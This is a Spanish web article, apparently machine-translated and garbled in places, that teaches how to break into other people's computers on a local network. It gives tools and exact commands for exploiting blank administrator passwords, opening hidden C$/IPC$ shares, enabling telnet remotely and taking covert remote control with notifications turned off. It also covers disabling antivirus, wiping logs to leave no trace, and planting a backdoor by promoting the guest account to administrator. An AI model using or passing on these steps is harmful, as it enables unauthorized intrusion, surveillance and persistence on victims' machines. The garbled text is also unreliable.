Red de conocimiento informático - Conocimiento informático - Cómo hackear las computadoras de otras personas en LAN

Cómo hackear las computadoras de otras personas en LAN

Controlar las computadoras de otras personas en una LAN no es relativamente tan difícil como en una WAN, pero todavía existen algunas habilidades. A continuación se muestra lo que he recopilado para usted sobre cómo piratear las computadoras de otras personas en la LAN. ¡Echemos un vistazo!

Cómo piratear las computadoras de otras personas en la LAN

¡Primero que nada! , hagamos una declaración:

1. El alcance de la intrusión solo incluye la red de área local. Si estás en la escuela, puedes invadir toda la red del campus.

2. Lo que se puede invadir es que hay una contraseña débil (el nombre de usuario es administrador, etc., la contraseña está vacía) y está activada en el puerto 139, pero la máquina no tiene un firewall habilitado.

Herramientas de intrusión:

Generalmente se utilizan tres: NTscan, escáner de anomalías, Recton--D He versión especial antivirus, DameWare mini versión china 4.5. El software antivirus informará sobre los virus. Se recomienda desactivar temporalmente el antivirus en tiempo real del software antivirus y cifrar los paquetes comprimidos de estos dos programas para evitar su eliminación)

Pasos de invasión:

 1. .Utilice "NTscan Annormal Scanner", complete el rango de IP a escanear en el campo IP, seleccione el método "WMI Scan", presione "Iniciar" y espere los resultados del escaneo.

2. Utilice "Recton--D He versión especial antivirus"

Seleccione el elemento "Comando CMD" e ingrese "net share C$=C:" en "CMD :" \", puede habilitar el uso compartido de la unidad C del host remoto, reemplace "C" con D, E, F, etc., puede habilitar el uso compartido de la unidad D, la unidad E, la unidad F, etc. ., este tipo de método para compartir está muy oculto y es completamente gratuito. No habrá ningún signo de compartir con una mano sosteniendo el disco en el host de la otra parte. Luego ingrese "\\ la IP de la otra parte en la barra de direcciones. . \C$", puede ingresar la unidad C de la otra parte.

Seleccione el elemento "Telnet", ingrese una IP recién escaneada en "Remote Host", inicie remotamente el servicio Telnet y, después de tener éxito, ejecute el comando en "Opciones CMD": "net share ipc$" , luego ejecute: "net share admin$", y finalmente ejecute "net use \\***.***.***.***\IPC$ "" /user:administrator" complete su intrusión en * IP del host.

3. Utilice "DameWare Mini versión china 4.5". Después de la instalación, haga clic en "DameWare Mini Remote Control", seleccione el producto de activación en el elemento "Ayuda", ingrese la información de registro y, después del registro exitoso, ingrese a la ventana "Conexión remota", complete la dirección IP en "Host", haga clic en "Configuración", haga clic en "Editar" en "Opciones de instalación del servicio", elimine "Notificar al conectarse" en el "Diálogo de notificación" y haga clic en " Configuraciones adicionales" Desmarque todo en "Opciones de usuario" y desmarque "Habilitar menú de opciones de usuario". Una vez completada la configuración, puede hacer clic en "Conectar" y hacer clic en "Aceptar" en el cuadro de diálogo emergente. Después del éxito, puede controlar las computadoras de otras personas como si fuera la suya. Por supuesto, también puede elegir monitorear solo la computadora. la pantalla de la otra parte. Nota: Si no se registra, aparecerá un cuadro de diálogo en el host de la otra parte, exponiendo su identidad.

Pasos de intrusión suplementarios:

1. En el paso 2 anterior, el servicio Telnet se puede iniciar de forma remota a través de "Mi Computadora-Administración-Conectar a otra computadora-Ingresar IP- Servicios y Aplicaciones-Servicios-Cambiar telnet a manual-Iniciar" Listo.

2. La versión especial del antivirus Recton--D Jeje también tiene otras funciones. En el elemento "Proceso", puede ver el proceso del host remoto y finalizar el proceso a voluntad en el ". *** Disfrute "En el elemento, puede crear un recurso compartido. Normalmente creo C$, D$, E$, F$. Las rutas del recurso compartido corresponden a C:\, D:\, etc. una vez completado el recurso compartido Ingrese "\\IP\C$" en la barra de direcciones, ingrese la unidad C de la otra parte y podrá copiar y eliminar el contenido a voluntad, y el ícono de compartir *** no se mostrará en la letra de la unidad. la máquina de la otra parte no será descubierta. Es mejor desactivar *** compartir después de hacerlo. Finalmente, seleccione "Registro" para borrar todos los registros sin dejar ningún rastro. Este software será tratado como un virus y eliminado por un software antivirus. El antivirus en tiempo real debe estar desactivado al usarlo.

3. Lo anterior *** se puede completar a través de CMD (Programa - Accesorios - Símbolo del sistema Primero "telnet IP", telnet arriba, escriba y y luego ingrese el nombre de usuario "administrador" y la contraseña). está vacío Después de ingresar, abra el comando para disfrutar del comando net share Para disfrutar de C$ (es decir, unidad C): "net share C$=C:", para disfrutar de la carpeta del sistema: "net share c= c:\. winnt\system32", utilice "net share IPC$" para compartir IPC$, etc. Finalmente, cierre el recurso compartido y cierre la unidad compartida C: "net share C$ /del".

4. Para facilitar la siguiente intrusión, puede configurar una puerta trasera, ver el usuario: "usuario de red", activar el usuario invitado

"usuario de red invitado /activo: sí ", cambie la contraseña del invitado es poco: "net user guest poco", y los permisos del invitado se actualizan a permisos de administrador: "net localgroup Administrators guest /add".

5. Hay muchos comandos telnet (comandos DOS). Puede buscar sus comandos en línea. Los más utilizados son: Ver archivos de la unidad D: ""dir d:\", Ver el archivo de programa de la unidad C. carpeta: "dir c:\PROGRA~1\;", apagado después de 60 segundos de cuenta regresiva: "shutdown -s -t 60"